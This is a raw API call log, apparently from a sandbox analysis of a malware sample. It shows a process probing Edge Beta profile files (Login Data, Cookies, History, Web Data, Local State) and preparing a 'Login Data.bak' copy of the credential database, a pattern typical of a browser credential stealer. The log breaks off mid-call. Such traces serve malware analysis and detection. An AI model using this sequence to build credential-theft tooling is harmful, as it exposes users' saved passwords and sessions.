[0180.639] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x55) returned 0x618290 [0180.639] GetProcessHeap () returned 0x5f0000 [0180.639] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6247e0 | out: hHeap=0x5f0000) returned 1 [0180.639] GetProcessHeap () returned 0x5f0000 [0180.639] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.639] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.639] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\Login Data") returned 0 [0180.639] GetProcessHeap () returned 0x5f0000 [0180.639] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.639] GetProcessHeap () returned 0x5f0000 [0180.639] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618290 | out: hHeap=0x5f0000) returned 1 [0180.639] GetProcessHeap () returned 0x5f0000 [0180.639] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f440 [0180.639] GetProcessHeap () returned 0x5f0000 [0180.640] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615f60 [0180.640] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.640] GetProcessHeap () returned 0x5f0000 [0180.640] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.640] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.640] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.640] GetProcessHeap () returned 0x5f0000 [0180.640] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.640] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.640] GetProcessHeap () returned 0x5f0000 [0180.640] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x28) returned 0x613440 [0180.640] GetProcessHeap () returned 0x5f0000 [0180.640] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613a70 [0180.640] GetProcessHeap () returned 0x5f0000 [0180.640] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613a70, Size=0x95) returned 0x611f60 [0180.640] GetProcessHeap () returned 0x5f0000 [0180.640] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4b) returned 0x620820 [0180.640] GetProcessHeap () returned 0x5f0000 [0180.640] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620820, Size=0xa3) returned 0x6247e0 [0180.640] GetProcessHeap () returned 0x5f0000 [0180.640] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x52) returned 0x6183b0 [0180.640] GetProcessHeap () returned 0x5f0000 [0180.640] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6247e0 | out: hHeap=0x5f0000) returned 1 [0180.640] GetProcessHeap () returned 0x5f0000 [0180.640] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.640] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.640] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\History") returned 0 [0180.641] GetProcessHeap () returned 0x5f0000 [0180.641] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.641] GetProcessHeap () returned 0x5f0000 [0180.641] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6183b0 | out: hHeap=0x5f0000) returned 1 [0180.641] GetProcessHeap () returned 0x5f0000 [0180.641] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f300 [0180.641] GetProcessHeap () returned 0x5f0000 [0180.641] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615ea0 [0180.641] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.641] GetProcessHeap () returned 0x5f0000 [0180.641] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.641] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.641] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.641] GetProcessHeap () returned 0x5f0000 [0180.641] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.641] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.641] GetProcessHeap () returned 0x5f0000 [0180.641] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x28) returned 0x613440 [0180.641] GetProcessHeap () returned 0x5f0000 [0180.641] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613b90 [0180.641] GetProcessHeap () returned 0x5f0000 [0180.641] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613b90, Size=0x95) returned 0x611f60 [0180.641] GetProcessHeap () returned 0x5f0000 [0180.641] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4b) returned 0x6201e0 [0180.641] GetProcessHeap () returned 0x5f0000 [0180.641] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6201e0, Size=0xa5) returned 0x6247e0 [0180.641] GetProcessHeap () returned 0x5f0000 [0180.641] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x53) returned 0x618b30 [0180.641] GetProcessHeap () returned 0x5f0000 [0180.641] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6247e0 | out: hHeap=0x5f0000) returned 1 [0180.641] GetProcessHeap () returned 0x5f0000 [0180.641] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.642] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.642] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\Web Data") returned 0 [0180.642] GetProcessHeap () returned 0x5f0000 [0180.642] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.642] GetProcessHeap () returned 0x5f0000 [0180.642] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618b30 | out: hHeap=0x5f0000) returned 1 [0180.642] GetProcessHeap () returned 0x5f0000 [0180.642] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f3e0 [0180.642] GetProcessHeap () returned 0x5f0000 [0180.642] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615f60 [0180.642] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.642] GetProcessHeap () returned 0x5f0000 [0180.642] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.642] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.642] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.642] GetProcessHeap () returned 0x5f0000 [0180.642] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.642] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.642] GetProcessHeap () returned 0x5f0000 [0180.642] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x28) returned 0x613440 [0180.642] GetProcessHeap () returned 0x5f0000 [0180.642] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x6139b0 [0180.642] GetProcessHeap () returned 0x5f0000 [0180.642] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6139b0, Size=0x95) returned 0x611f60 [0180.642] GetProcessHeap () returned 0x5f0000 [0180.642] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4b) returned 0x620410 [0180.642] GetProcessHeap () returned 0x5f0000 [0180.642] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620410, Size=0xb1) returned 0x621a00 [0180.642] GetProcessHeap () returned 0x5f0000 [0180.642] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x59) returned 0x6183b0 [0180.642] GetProcessHeap () returned 0x5f0000 [0180.643] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x621a00 | out: hHeap=0x5f0000) returned 1 [0180.643] GetProcessHeap () returned 0x5f0000 [0180.643] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.643] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.643] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\..\\Local State") returned 0 [0180.643] GetProcessHeap () returned 0x5f0000 [0180.643] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.643] GetProcessHeap () returned 0x5f0000 [0180.643] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6183b0 | out: hHeap=0x5f0000) returned 1 [0180.643] GetProcessHeap () returned 0x5f0000 [0180.643] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f310 [0180.643] GetProcessHeap () returned 0x5f0000 [0180.643] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615d60 [0180.643] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.643] GetProcessHeap () returned 0x5f0000 [0180.643] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615d60 | out: hHeap=0x5f0000) returned 1 [0180.643] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.643] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.643] GetProcessHeap () returned 0x5f0000 [0180.643] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.643] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.643] GetProcessHeap () returned 0x5f0000 [0180.643] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x28) returned 0x613440 [0180.643] GetProcessHeap () returned 0x5f0000 [0180.643] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613a70 [0180.643] GetProcessHeap () returned 0x5f0000 [0180.643] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613a70, Size=0x95) returned 0x611f60 [0180.643] GetProcessHeap () returned 0x5f0000 [0180.644] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4b) returned 0x620410 [0180.644] GetProcessHeap () returned 0x5f0000 [0180.644] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620410, Size=0xa3) returned 0x6247e0 [0180.644] GetProcessHeap () returned 0x5f0000 [0180.644] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x52) returned 0x618290 [0180.644] GetProcessHeap () returned 0x5f0000 [0180.644] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6247e0 | out: hHeap=0x5f0000) returned 1 [0180.644] GetProcessHeap () returned 0x5f0000 [0180.644] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.644] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.644] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\Cookies") returned 0 [0180.644] GetProcessHeap () returned 0x5f0000 [0180.644] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.644] GetProcessHeap () returned 0x5f0000 [0180.644] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618290 | out: hHeap=0x5f0000) returned 1 [0180.644] GetProcessHeap () returned 0x5f0000 [0180.644] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x105) returned 0x6247e0 [0180.644] GetProcessHeap () returned 0x5f0000 [0180.644] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f330 [0180.644] GetProcessHeap () returned 0x5f0000 [0180.644] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x105) returned 0x624900 [0180.644] GetProcessHeap () returned 0x5f0000 [0180.644] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615ea0 [0180.644] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.644] GetProcessHeap () returned 0x5f0000 [0180.644] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.644] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x624900, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.644] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.644] GetProcessHeap () returned 0x5f0000 [0180.644] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f3b0 [0180.644] GetProcessHeap () returned 0x5f0000 [0180.645] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.645] GetProcessHeap () returned 0x5f0000 [0180.645] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x95) returned 0x611f60 [0180.645] GetProcessHeap () returned 0x5f0000 [0180.645] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4b) returned 0x6207d0 [0180.645] GetProcessHeap () returned 0x5f0000 [0180.645] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6207d0, Size=0xa9) returned 0x624a20 [0180.645] GetProcessHeap () returned 0x5f0000 [0180.645] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x55) returned 0x618290 [0180.645] GetProcessHeap () returned 0x5f0000 [0180.645] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x618290, Size=0xb1) returned 0x621040 [0180.645] GetProcessHeap () returned 0x5f0000 [0180.645] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624a20 | out: hHeap=0x5f0000) returned 1 [0180.645] GetProcessHeap () returned 0x5f0000 [0180.645] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.645] GetProcessHeap () returned 0x5f0000 [0180.645] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3b0 | out: hHeap=0x5f0000) returned 1 [0180.645] GetProcessHeap () returned 0x5f0000 [0180.645] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x615ca0 [0180.645] GetProcAddress (hModule=0x7ffb26230000, lpProcName="MultiByteToWideChar") returned 0x7ffb2624d500 [0180.645] GetProcessHeap () returned 0x5f0000 [0180.645] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x621040, cbMultiByte=88, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 88 [0180.645] GetProcAddress (hModule=0x7ffb288f0000, lpProcName="SysAllocStringLen") returned 0x7ffb288fe5b0 [0180.645] GetProcessHeap () returned 0x5f0000 [0180.645] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f360 [0180.645] GetProcessHeap () returned 0x5f0000 [0180.645] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x615ca0 [0180.645] GetProcAddress (hModule=0x7ffb26230000, lpProcName="MultiByteToWideChar") returned 0x7ffb2624d500 [0180.645] GetProcessHeap () returned 0x5f0000 [0180.646] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x621040, cbMultiByte=88, lpWideCharStr=0x621108, cchWideChar=88 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\Login Data.bak") returned 88 [0180.646] GetProcessHeap () returned 0x5f0000 [0180.646] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x615f60 [0180.646] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WideCharToMultiByte") returned 0x7ffb2624b490 [0180.646] GetProcessHeap () returned 0x5f0000 [0180.646] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\Login Data.bak", cchWideChar=88, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 88 [0180.646] GetProcessHeap () returned 0x5f0000 [0180.646] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f280 [0180.646] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0180.646] GetProcessHeap () returned 0x5f0000 [0180.646] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f280 | out: hHeap=0x5f0000) returned 1 [0180.646] GetProcessHeap () returned 0x5f0000 [0180.646] GetProcessHeap () returned 0x5f0000 [0180.646] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f280 [0180.646] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0180.646] GetProcessHeap () returned 0x5f0000 [0180.646] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f280 | out: hHeap=0x5f0000) returned 1 [0180.646] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f360, Size=0x59) returned 0x618170 [0180.646] GetProcessHeap () returned 0x5f0000 [0180.646] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x615ca0 [0180.646] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WideCharToMultiByte") returned 0x7ffb2624b490 [0180.646] GetProcessHeap () returned 0x5f0000 [0180.647] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\Login Data.bak", cchWideChar=88, lpMultiByteStr=0x618170, cbMultiByte=88, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\Login Data.bak", lpUsedDefaultChar=0x0) returned 88 [0180.647] GetProcAddress (hModule=0x7ffb288f0000, lpProcName="SysFreeString") returned 0x7ffb28900ae0 [0180.647] GetProcessHeap () returned 0x5f0000 [0180.647] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x59) returned 0x618950 [0180.647] GetProcessHeap () returned 0x5f0000 [0180.647] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618170 | out: hHeap=0x5f0000) returned 1 [0180.647] GetProcessHeap () returned 0x5f0000 [0180.647] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618950 | out: hHeap=0x5f0000) returned 1 [0180.647] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2a0) returned 0x624d50 [0180.647] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x624d50) returned 0x2a0 [0180.647] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30) returned 0x613320 [0180.647] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x613320) returned 0x30 [0180.647] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x80) returned 0x611f60 [0180.647] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x611f60) returned 0x80 [0180.647] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x20) returned 0x615ca0 [0180.647] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x615ca0) returned 0x20 [0180.648] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x80) returned 0x624a20 [0180.648] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x624a20) returned 0x80 [0180.648] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x20) returned 0x615f60 [0180.648] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x615f60) returned 0x20 [0180.648] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x80) returned 0x625000 [0180.648] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625000) returned 0x80 [0180.648] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x20) returned 0x615dc0 [0180.648] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x615dc0) returned 0x20 [0180.648] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x60) returned 0x618b30 [0180.648] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x618b30) returned 0x60 [0180.648] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x48) returned 0x6200f0 [0180.648] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x6200f0) returned 0x48 [0180.648] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x88) returned 0x61c550 [0180.648] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x61c550) returned 0x88 [0180.648] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x828) returned 0x625090 [0180.648] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625090) returned 0x828 [0180.648] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x618b30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0180.648] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb8) returned 0x6211c0 [0180.648] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x6211c0) returned 0xb8 [0180.648] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x618b30, cbMultiByte=-1, lpWideCharStr=0x6211c0, cchWideChar=89 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\Login Data.bak") returned 89 [0180.648] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\Login Data.bak", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x59 [0180.648] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb8) returned 0x621dc0 [0180.648] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x621dc0) returned 0xb8 [0180.649] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\Login Data.bak", nBufferLength=0x5c, lpBuffer=0x621dc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\Login Data.bak", lpFilePart=0x0) returned 0x58 [0180.649] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x6211c0) returned 0xb8 [0180.649] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6211c0 | out: hHeap=0x5f0000) returned 1 [0180.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\Login Data.bak", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 89 [0180.649] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x60) returned 0x6187d0 [0180.649] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x6187d0) returned 0x60 [0180.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\Login Data.bak", cchWideChar=-1, lpMultiByteStr=0x6187d0, cbMultiByte=89, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\Login Data.bak", lpUsedDefaultChar=0x0) returned 89 [0180.649] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x621dc0) returned 0xb8 [0180.649] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x621dc0 | out: hHeap=0x5f0000) returned 1 [0180.649] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x6187d0) returned 0x60 [0180.649] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6187d0 | out: hHeap=0x5f0000) returned 1 [0180.649] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3d0) returned 0x6258d0 [0180.649] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x6258d0) returned 0x3d0 [0180.649] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625090) returned 0x828 [0180.649] HeapFree 